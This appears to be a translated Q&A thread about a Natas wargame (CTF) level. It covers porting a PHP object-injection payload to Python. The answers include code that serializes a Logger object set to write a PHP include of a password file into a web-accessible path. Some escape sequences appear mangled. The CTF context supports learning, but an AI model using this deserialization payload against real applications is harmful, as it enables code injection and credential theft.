在尝试在线执行nataschallage时,我想将php代码转换为python,但没有得到预期的结果。可能是我在phpserialize中遗漏了什么
为什么它给出不同的输出?
Python代码
import base64
from phpserialize import serialize
payload = {'initMsg': "", 'exitMsg': "<?php include('/etc/natas_webpass/natas27');?>", 'logFile': "img/code.php"}
new_ser = base64.encodestring(serialize(payload))
print(new_ser)
PHP代码
<?php
class Logger{
private $logFile;
private $initMsg;
private $exitMsg;
function __construct(){
$this->initMsg = "";
$this->exitMsg = "<?php include('/etc/natas_webpass/natas27');?>";
$this->logFile = "img/code.php";
}
}
$obj = new Logger();
echo base64_encode(serialize($obj));
?>
PHP代码产生:Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxMjoiaW1nL2NvZGUucGhwIjtzOjE1OiIATG9nZ2VyAGluaXRNc2ciO3M6MDoiIjtzOjE1OiIATG9nZ2VyAGV4aXRNc2ciO3M6NDY6Ijw/cGhwIGluY2x1ZGUoJy9ldGMvbmF0YXNfd2VicGFzcy9uYXRhczI3Jyk7Pz4iO30=
python代码产生:
b'YTozOntzOjc6ImluaXRNc2ciO3M6MDoiIjtzOjc6ImV4aXRNc2ciO3M6NDY6Ijw/cGhwIGluY2x1nZGUoJy9ldGMvbmF0YXNfd2VicGFzcy9uYXRhczI3Jyk7Pz4iO3M6NzoibG9nRmlsZSI7czoxMjoinaW1nL2NvZGUucGhwIjt9n'
您在python版本中序列化了一个散列,在PHP版本中序列化一个对象。只需将对象转换为散列(关联数组),就会得到相同的结果:
<?php
$obj = array();
$obj['initMsg'] = '';
$obj['exitMsg'] = "<?php include('/etc/natas_webpass/natas27');?>";
$obj['logFile'] = "img/code.php";
echo base64_encode(serialize($obj));
?>
在查看文档后,我提出了一个解决方案,首先将数据转换为对象,然后进行序列化。
@Maxim制作了类似python的PHP代码,
下面的代码使Python代码像PHP一样
这感觉是一种艰难的方式,不确定是否可以让它变得更简单。
class Logger():
def __init__(self,initMsg,exitMsg,logFile):
self.initMsg = initMsg
self.exitMsg = exitMsg
self.logFile = logFile
def object_hook(obj):
if isinstance(obj, Logger):
return phpobject('Logger', {b'x00Loggerx00initMsg': obj.initMsg, b'x00Loggerx00exitMsg': obj.exitMsg, b'x00Loggerx00logFile': obj.logFile})
logger = Logger("", "<?php include('/etc/natas_webpass/natas27');?>", "img/code.php")
new_ser = base64.encodestring(serialize(logger, object_hook=object_hook)).replace(b'n', b'').decode('ascii')